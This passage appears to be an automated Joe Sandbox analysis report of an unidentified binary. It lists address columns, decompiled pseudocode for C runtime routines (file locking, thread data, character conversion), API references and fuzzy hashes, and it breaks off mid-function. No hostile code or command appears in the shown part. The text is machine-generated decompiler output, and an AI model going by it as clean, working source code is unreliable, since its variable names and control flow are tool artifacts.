                                                                        0x0040be19
                                                                        0x0040be1c
                                                                        0x0040be1e
                                                                        0x00000000
                                                                        0x0040be1e
                                                                        0x0040bdee
                                                                        0x0040bd72
                                                                        0x0040bd75
                                                                        0x0040bd77
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040bd79
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040bd7f
                                                                        0x0040bd81
                                                                        0x0040bd83
                                                                        0x0040bd85
                                                                        0x0040bd85
                                                                        0x0040bd87
                                                                        0x0040bd8a
                                                                        0x0040be5b
                                                                        0x0040be5d
                                                                        0x0040be61
                                                                        0x0040be6a
                                                                        0x0040be6f
                                                                        0x0040be6f
                                                                        0x0040be72
                                                                        0x0040be77
                                                                        0x0040be78
                                                                        0x0040be79
                                                                        0x0040be7a
                                                                        0x0040be7b
                                                                        0x0040be81
                                                                        0x00000000
                                                                        0x0040bd90
                                                                        0x0040bd99
                                                                        0x0040bd9e
                                                                        0x0040bda1
                                                                        0x0040bda3
                                                                        0x0040bda6
                                                                        0x0040bda8
                                                                        0x0040bdab
                                                                        0x0040bdae
                                                                        0x0040bdae
                                                                        0x0040be4b
                                                                        0x0040be4b
                                                                        0x0040be4b
                                                                        0x00000000
                                                                        0x0040bd69
                                                                        0x0040bd63
                                                                        0x0040bd2e
                                                                        0x0040bd0f
                                                                        0x0040bd14
                                                                        0x0040bd14
                                                                        0x0040bd17
                                                                        0x0040bd1a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040bd1a
                                                                        0x0040bce9
                                                                        0x0040bce9
                                                                        0x0040bcee
                                                                        0x0040bcef
                                                                        0x0040bcf0
                                                                        0x0040bcf1
                                                                        0x0040bcf2
                                                                        0x0040bcf8
                                                                        0x00000000
                                                                        0x0040bcf8

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                        • String ID:
                                                                        • API String ID: 3886058894-0
                                                                        • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                        • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                        • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                        • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                        				signed int _t13;
                                                                        				intOrPtr _t28;
                                                                        				void* _t29;
                                                                        				void* _t30;
                                                                        
                                                                        				_t30 = __eflags;
                                                                        				_t26 = __edi;
                                                                        				_t25 = __edx;
                                                                        				_t22 = __ebx;
                                                                        				_push(0xc);
                                                                        				_push(0x4214d0);
                                                                        				E0040E1D8(__ebx, __edi, __esi);
                                                                        				_t28 = E00410735(__ebx, __edx, __edi, _t30);
                                                                        				_t13 =  *0x422e34; // 0xfffffffe
                                                                        				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                        					L6:
                                                                        					E0040D6E0(_t22, 0xc);
                                                                        					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                        					_t8 = _t28 + 0x6c; // 0x6c
                                                                        					_t26 =  *0x422f18; // 0x422e40
                                                                        					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
                                                                        					 *(_t29 - 4) = 0xfffffffe;
                                                                        					E004147A2();
                                                                        				} else {
                                                                        					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                        					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                        						goto L6;
                                                                        					} else {
                                                                        						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
                                                                        					}
                                                                        				}
                                                                        				if(_t28 == 0) {
                                                                        					E0040E79A(_t25, _t26, 0x20);
                                                                        				}
                                                                        				return E0040E21D(_t28);
                                                                        			}







                                                                        0x00414738
                                                                        0x00414738
                                                                        0x00414738
                                                                        0x00414738
                                                                        0x00414738
                                                                        0x0041473a
                                                                        0x0041473f
                                                                        0x00414749
                                                                        0x0041474b
                                                                        0x00414753
                                                                        0x00414777
                                                                        0x00414779
                                                                        0x0041477f
                                                                        0x00414783
                                                                        0x00414786
                                                                        0x00414791
                                                                        0x00414794
                                                                        0x0041479b
                                                                        0x00414755
                                                                        0x00414755
                                                                        0x00414759
                                                                        0x00000000
                                                                        0x0041475b
                                                                        0x00414760
                                                                        0x00414760
                                                                        0x00414759
                                                                        0x00414765
                                                                        0x00414769
                                                                        0x0041476e
                                                                        0x00414776

                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 00414744
                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                        • __getptd.LIBCMT ref: 0041475B
                                                                        • __amsg_exit.LIBCMT ref: 00414769
                                                                        • __lock.LIBCMT ref: 00414779
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                        • String ID: @.B
                                                                        • API String ID: 3521780317-470711618
                                                                        • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                        • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                        • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                        • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				void* _t16;
                                                                        				void* _t17;
                                                                        				intOrPtr _t19;
                                                                        				void* _t21;
                                                                        				signed int _t22;
                                                                        				intOrPtr* _t27;
                                                                        				intOrPtr _t39;
                                                                        				intOrPtr _t40;
                                                                        				intOrPtr _t50;
                                                                        
                                                                        				_t37 = __edx;
                                                                        				_push(8);
                                                                        				_push(0x421140);
                                                                        				E0040E1D8(__ebx, __edi, __esi);
                                                                        				_t39 = _a4;
                                                                        				_t50 = _t39;
                                                                        				_t51 = _t50 != 0;
                                                                        				if(_t50 != 0) {
                                                                        					E0040FB29(_t39);
                                                                        					_v8 = 0;
                                                                        					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                                                                        					_t16 = E0040FA20(__edx, _t39, _t39);
                                                                        					__eflags = _t16 - 0xffffffff;
                                                                        					if(_t16 == 0xffffffff) {
                                                                        						L6:
                                                                        						_t17 = 0x4227e0;
                                                                        					} else {
                                                                        						_t21 = E0040FA20(__edx, _t39, _t39);
                                                                        						__eflags = _t21 - 0xfffffffe;
                                                                        						if(_t21 == 0xfffffffe) {
                                                                        							goto L6;
                                                                        						} else {
                                                                        							_t22 = E0040FA20(__edx, _t39, _t39);
                                                                        							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
                                                                        						}
                                                                        					}
                                                                        					_t9 = _t17 + 4; // 0xa80
                                                                        					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                                                                        					_v8 = 0xfffffffe;
                                                                        					E0040C735(_t39);
                                                                        					_t19 = 0;
                                                                        					__eflags = 0;
                                                                        				} else {
                                                                        					_t27 = E0040BFC1(_t51);
                                                                        					_t40 = 0x16;
                                                                        					 *_t27 = _t40;
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					E0040E744(__edx, _t40, 0);
                                                                        					_t19 = _t40;
                                                                        				}
                                                                        				return E0040E21D(_t19);
                                                                        			}













                                                                        0x0040c73d
                                                                        0x0040c690
                                                                        0x0040c692
                                                                        0x0040c697
                                                                        0x0040c69e
                                                                        0x0040c6a3
                                                                        0x0040c6a8
                                                                        0x0040c6aa
                                                                        0x0040c6c8
                                                                        0x0040c6ce
                                                                        0x0040c6d1
                                                                        0x0040c6d6
                                                                        0x0040c6dc
                                                                        0x0040c6df
                                                                        0x0040c70f
                                                                        0x0040c70f
                                                                        0x0040c6e1
                                                                        0x0040c6e2
                                                                        0x0040c6e8
                                                                        0x0040c6eb
                                                                        0x00000000
                                                                        0x0040c6ed
                                                                        0x0040c6ee
                                                                        0x0040c70b
                                                                        0x0040c70b
                                                                        0x0040c6eb
                                                                        0x0040c714
                                                                        0x0040c71b
                                                                        0x0040c71e
                                                                        0x0040c725
                                                                        0x0040c72a
                                                                        0x0040c72a
                                                                        0x0040c6ac
                                                                        0x0040c6ac
                                                                        0x0040c6b3
                                                                        0x0040c6b4
                                                                        0x0040c6b6
                                                                        0x0040c6b7
                                                                        0x0040c6b8
                                                                        0x0040c6b9
                                                                        0x0040c6ba
                                                                        0x0040c6bb
                                                                        0x0040c6c3
                                                                        0x0040c6c3
                                                                        0x0040c731

                                                                        APIs
                                                                        • __lock_file.LIBCMT ref: 0040C6C8
                                                                        • __fileno.LIBCMT ref: 0040C6D6
                                                                        • __fileno.LIBCMT ref: 0040C6E2
                                                                        • __fileno.LIBCMT ref: 0040C6EE
                                                                        • __fileno.LIBCMT ref: 0040C6FE
                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                        • String ID:
                                                                        • API String ID: 2805327698-0
                                                                        • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                        • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                        • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                        • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                        				signed int _t15;
                                                                        				LONG* _t21;
                                                                        				long _t23;
                                                                        				void* _t31;
                                                                        				LONG* _t33;
                                                                        				void* _t34;
                                                                        				void* _t35;
                                                                        
                                                                        				_t35 = __eflags;
                                                                        				_t29 = __edx;
                                                                        				_t25 = __ebx;
                                                                        				_push(0xc);
                                                                        				_push(0x421490);
                                                                        				E0040E1D8(__ebx, __edi, __esi);
                                                                        				_t31 = E00410735(__ebx, __edx, __edi, _t35);
                                                                        				_t15 =  *0x422e34; // 0xfffffffe
                                                                        				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                        					E0040D6E0(_t25, 0xd);
                                                                        					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                        					_t33 =  *(_t31 + 0x68);
                                                                        					 *(_t34 - 0x1c) = _t33;
                                                                        					__eflags = _t33 -  *0x422d38; // 0x2031660
                                                                        					if(__eflags != 0) {
                                                                        						__eflags = _t33;
                                                                        						if(_t33 != 0) {
                                                                        							_t23 = InterlockedDecrement(_t33);
                                                                        							__eflags = _t23;
                                                                        							if(_t23 == 0) {
                                                                        								__eflags = _t33 - 0x422910;
                                                                        								if(__eflags != 0) {
                                                                        									_push(_t33);
                                                                        									E0040B6B5(_t25, _t31, _t33, __eflags);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_t21 =  *0x422d38; // 0x2031660
                                                                        						 *(_t31 + 0x68) = _t21;
                                                                        						_t33 =  *0x422d38; // 0x2031660
                                                                        						 *(_t34 - 0x1c) = _t33;
                                                                        						InterlockedIncrement(_t33);
                                                                        					}
                                                                        					 *(_t34 - 4) = 0xfffffffe;
                                                                        					E00414067();
                                                                        				} else {
                                                                        					_t33 =  *(_t31 + 0x68);
                                                                        				}
                                                                        				if(_t33 == 0) {
                                                                        					E0040E79A(_t29, _t31, 0x20);
                                                                        				}
                                                                        				return E0040E21D(_t33);
                                                                        			}










                                                                        0x00413fcc
                                                                        0x00413fcc
                                                                        0x00413fcc
                                                                        0x00413fcc
                                                                        0x00413fce
                                                                        0x00413fd3
                                                                        0x00413fdd
                                                                        0x00413fdf
                                                                        0x00413fe7
                                                                        0x00414008
                                                                        0x0041400e
                                                                        0x00414012
                                                                        0x00414015
                                                                        0x00414018
                                                                        0x0041401e
                                                                        0x00414020
                                                                        0x00414022
                                                                        0x00414025
                                                                        0x0041402b
                                                                        0x0041402d
                                                                        0x0041402f
                                                                        0x00414035
                                                                        0x00414037
                                                                        0x00414038
                                                                        0x0041403d
                                                                        0x00414035
                                                                        0x0041402d
                                                                        0x0041403e
                                                                        0x00414043
                                                                        0x00414046
                                                                        0x0041404c
                                                                        0x00414050
                                                                        0x00414050
                                                                        0x00414056
                                                                        0x0041405d
                                                                        0x00413fef
                                                                        0x00413fef
                                                                        0x00413fef
                                                                        0x00413ff4
                                                                        0x00413ff8
                                                                        0x00413ffd
                                                                        0x00414005

                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 00413FD8
                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                        • __amsg_exit.LIBCMT ref: 00413FF8
                                                                        • __lock.LIBCMT ref: 00414008
                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                        • InterlockedIncrement.KERNEL32(02031660), ref: 00414050
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                        • String ID:
                                                                        • API String ID: 4271482742-0
                                                                        • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                        • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                        • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                        • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 65%
                                                                        			E00413610() {
                                                                        				signed long long _v12;
                                                                        				signed int _v20;
                                                                        				signed long long _v28;
                                                                        				signed char _t8;
                                                                        
                                                                        				_t8 = GetModuleHandleA("KERNEL32");
                                                                        				if(_t8 == 0) {
                                                                        					L6:
                                                                        					_v20 =  *0x41fb50;
                                                                        					_v28 =  *0x41fb48;
                                                                        					asm("fsubr qword [ebp-0x18]");
                                                                        					_v12 = _v28 / _v20 * _v20;
                                                                        					asm("fld1");
                                                                        					asm("fcomp qword [ebp-0x8]");
                                                                        					asm("fnstsw ax");
                                                                        					if((_t8 & 0x00000005) != 0) {
                                                                        						return 0;
                                                                        					} else {
                                                                        						return 1;
                                                                        					}
                                                                        				} else {
                                                                        					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                        					if(__eax == 0) {
                                                                        						goto L6;
                                                                        					} else {
                                                                        						_push(0);
                                                                        						return __eax;
                                                                        					}
                                                                        				}
                                                                        			}







                                                                        0x00413615
                                                                        0x0041361d
                                                                        0x00413634
                                                                        0x004135e0
                                                                        0x004135e9
                                                                        0x004135f5
                                                                        0x004135f8
                                                                        0x004135fb
                                                                        0x004135fd
                                                                        0x00413600
                                                                        0x00413605
                                                                        0x0041360f
                                                                        0x00413607
                                                                        0x0041360b
                                                                        0x0041360b
                                                                        0x0041361f
                                                                        0x00413625
                                                                        0x0041362d
                                                                        0x00000000
                                                                        0x0041362f
                                                                        0x0041362f
                                                                        0x00413633
                                                                        0x00413633
                                                                        0x0041362d

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                        • API String ID: 1646373207-3105848591
                                                                        • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                        • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                        • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                        • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 84%
                                                                        			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                                                                        				void* __ebx;
                                                                        				void* __ebp;
                                                                        				signed int _t12;
                                                                        				void* _t21;
                                                                        				int _t25;
                                                                        				void* _t30;
                                                                        				int _t32;
                                                                        				char* _t35;
                                                                        
                                                                        				_t21 = __edx;
                                                                        				_t35 = _a4;
                                                                        				_t17 = __ecx;
                                                                        				if(_t35 != 0) {
                                                                        					_t25 = lstrlenA(_t35) + 1;
                                                                        					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                                                                        					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25);
                                                                        					asm("sbb esi, esi");
                                                                        					_t30 =  ~_t12 + 1;
                                                                        					if(_t30 != 0) {
                                                                        						_t12 = GetLastError();
                                                                        						if(_t12 == 0x7a) {
                                                                        							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                                                                        							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                                                                        							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                                                                        							asm("sbb esi, esi");
                                                                        							_t30 =  ~_t12 + 1;
                                                                        						}
                                                                        						if(_t30 != 0) {
                                                                        							_t12 = E00401030();
                                                                        						}
                                                                        					}
                                                                        					return _t12;
                                                                        				} else {
                                                                        					 *__ecx = _t35;
                                                                        					return __eax;
                                                                        				}
                                                                        			}











                                                                        0x004018f0
                                                                        0x004018f2
                                                                        0x004018f6
                                                                        0x004018fa
                                                                        0x00401917
                                                                        0x0040191a
                                                                        0x0040192f
                                                                        0x00401939
                                                                        0x0040193b
                                                                        0x0040193e
                                                                        0x00401940
                                                                        0x00401949
                                                                        0x0040195e
                                                                        0x0040196b
                                                                        0x00401980
                                                                        0x0040198a
                                                                        0x0040198c
                                                                        0x0040198c
                                                                        0x0040198f
                                                                        0x00401991
                                                                        0x00401991
                                                                        0x0040198f
                                                                        0x0040199a
                                                                        0x004018fc
                                                                        0x004018fc
                                                                        0x00401900
                                                                        0x00401900

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?), ref: 00401906
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                        • GetLastError.KERNEL32 ref: 00401940
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.360346336.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.360346336.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_arJf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                        • String ID:
                                                                        • API String ID: 3322701435-0
                                                                        • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                        • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                        • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                        • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E0040C748(void* __edx, void* __esi, char _a4) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __ebp;
                                                                        				signed int _t70;
                                                                        				signed int _t71;
                                                                        				intOrPtr _t73;
                                                                        				signed int _t75;
                                                                        				signed int _t81;
                                                                        				char _t82;
                                                                        				signed int _t84;
                                                                        				intOrPtr* _t86;
                                                                        				signed int _t87;
                                                                        				intOrPtr* _t90;
                                                                        				signed int _t92;
                                                                        				signed int _t94;
                                                                        				void* _t96;
                                                                        				signed char _t98;
                                                                        				signed int _t99;
                                                                        				intOrPtr _t102;
                                                                        				signed int _t103;
                                                                        				intOrPtr* _t104;
                                                                        				signed int _t111;
                                                                        				signed int _t114;
                                                                        				intOrPtr _t115;
                                                                        
                                                                        				_t105 = __esi;
                                                                        				_t97 = __edx;
                                                                        				_t104 = _a4;
                                                                        				_t87 = 0;
                                                                        				_t121 = _t104;
                                                                        				if(_t104 != 0) {
                                                                        					_t70 = E0040FA20(__edx, _t104, _t104);
                                                                        					__eflags =  *(_t104 + 4);
                                                                        					_v8 = _t70;
                                                                        					if(__eflags < 0) {
                                                                        						 *(_t104 + 4) = 0;
                                                                        					}
                                                                        					_push(1);
                                                                        					_push(_t87);
                                                                        					_push(_t70);
                                                                        					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
                                                                        					__eflags = _t71 - _t87;
                                                                        					_v12 = _t71;
                                                                        					if(_t71 < _t87) {
                                                                        						L2:
                                                                        						return _t71 | 0xffffffff;
                                                                        					} else {
                                                                        						_t98 =  *(_t104 + 0xc);
                                                                        						__eflags = _t98 & 0x00000108;
                                                                        						if((_t98 & 0x00000108) != 0) {
                                                                        							_t73 =  *_t104;
                                                                        							_t92 =  *(_t104 + 8);
                                                                        							_push(_t105);
                                                                        							_v16 = _t73 - _t92;
                                                                        							__eflags = _t98 & 0x00000003;
                                                                        							if((_t98 & 0x00000003) == 0) {
                                                                        								__eflags = _t98;
                                                                        								if(__eflags < 0) {
                                                                        									L15:
                                                                        									__eflags = _v12 - _t87;
                                                                        									if(_v12 != _t87) {
                                                                        										__eflags =  *(_t104 + 0xc) & 0x00000001;
                                                                        										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                                                                        											L40:
                                                                        											_t75 = _v16 + _v12;
                                                                        											__eflags = _t75;
                                                                        											L41:
                                                                        											return _t75;
                                                                        										}
                                                                        										_t99 =  *(_t104 + 4);
                                                                        										__eflags = _t99 - _t87;
                                                                        										if(_t99 != _t87) {
                                                                        											_t90 = 0x423f60 + (_v8 >> 5) * 4;
                                                                        											_a4 = _t73 - _t92 + _t99;
                                                                        											_t111 = (_v8 & 0x0000001f) << 6;
                                                                        											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                                                                        											if(__eflags == 0) {
                                                                        												L39:
                                                                        												_t66 =  &_v12;
                                                                        												 *_t66 = _v12 - _a4;
                                                                        												__eflags =  *_t66;
                                                                        												goto L40;
                                                                        											}
                                                                        											_push(2);
                                                                        											_push(0);
                                                                        											_push(_v8);
                                                                        											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
                                                                        											if(__eflags != 0) {
                                                                        												_push(0);
                                                                        												_push(_v12);
                                                                        												_push(_v8);
                                                                        												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
                                                                        												__eflags = _t81;
                                                                        												if(_t81 >= 0) {
                                                                        													_t82 = 0x200;
                                                                        													__eflags = _a4 - 0x200;
                                                                        													if(_a4 > 0x200) {
                                                                        														L35:
                                                                        														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                                                                        														L36:
                                                                        														_a4 = _t82;
                                                                        														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                                                                        														L37:
                                                                        														if(__eflags != 0) {
                                                                        															_t63 =  &_a4;
                                                                        															 *_t63 = _a4 + 1;
                                                                        															__eflags =  *_t63;
                                                                        														}
                                                                        														goto L39;
                                                                        													}
                                                                        													_t94 =  *(_t104 + 0xc);
                                                                        													__eflags = _t94 & 0x00000008;
                                                                        													if((_t94 & 0x00000008) == 0) {
                                                                        														goto L35;
                                                                        													}
                                                                        													__eflags = _t94 & 0x00000400;
                                                                        													if((_t94 & 0x00000400) == 0) {
                                                                        														goto L36;
                                                                        													}
                                                                        													goto L35;
                                                                        												}
                                                                        												L31:
                                                                        												_t75 = _t81 | 0xffffffff;
                                                                        												goto L41;
                                                                        											}
                                                                        											_t84 =  *(_t104 + 8);
                                                                        											_t96 = _a4 + _t84;
                                                                        											while(1) {
                                                                        												__eflags = _t84 - _t96;
                                                                        												if(_t84 >= _t96) {
                                                                        													break;
                                                                        												}
                                                                        												__eflags =  *_t84 - 0xa;
                                                                        												if( *_t84 == 0xa) {
                                                                        													_t44 =  &_a4;
                                                                        													 *_t44 = _a4 + 1;
                                                                        													__eflags =  *_t44;
                                                                        												}
                                                                        												_t84 = _t84 + 1;
                                                                        												__eflags = _t84;
                                                                        											}
                                                                        											__eflags =  *(_t104 + 0xc) & 0x00002000;
                                                                        											goto L37;
                                                                        										}
                                                                        										_v16 = _t87;
                                                                        										goto L40;
                                                                        									}
                                                                        									_t75 = _v16;
                                                                        									goto L41;
                                                                        								}
                                                                        								_t81 = E0040BFC1(__eflags);
                                                                        								 *_t81 = 0x16;
                                                                        								goto L31;
                                                                        							}
                                                                        							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
                                                                        							_t114 = (_v8 & 0x0000001f) << 6;
                                                                        							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                                                                        							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                                                                        								goto L15;
                                                                        							}
                                                                        							_t103 = _t92;
                                                                        							__eflags = _t103 - _t73;
                                                                        							if(_t103 >= _t73) {
                                                                        								goto L15;
                                                                        							}
                                                                        							_t115 = _t73;
                                                                        							do {
                                                                        								__eflags =  *_t103 - 0xa;
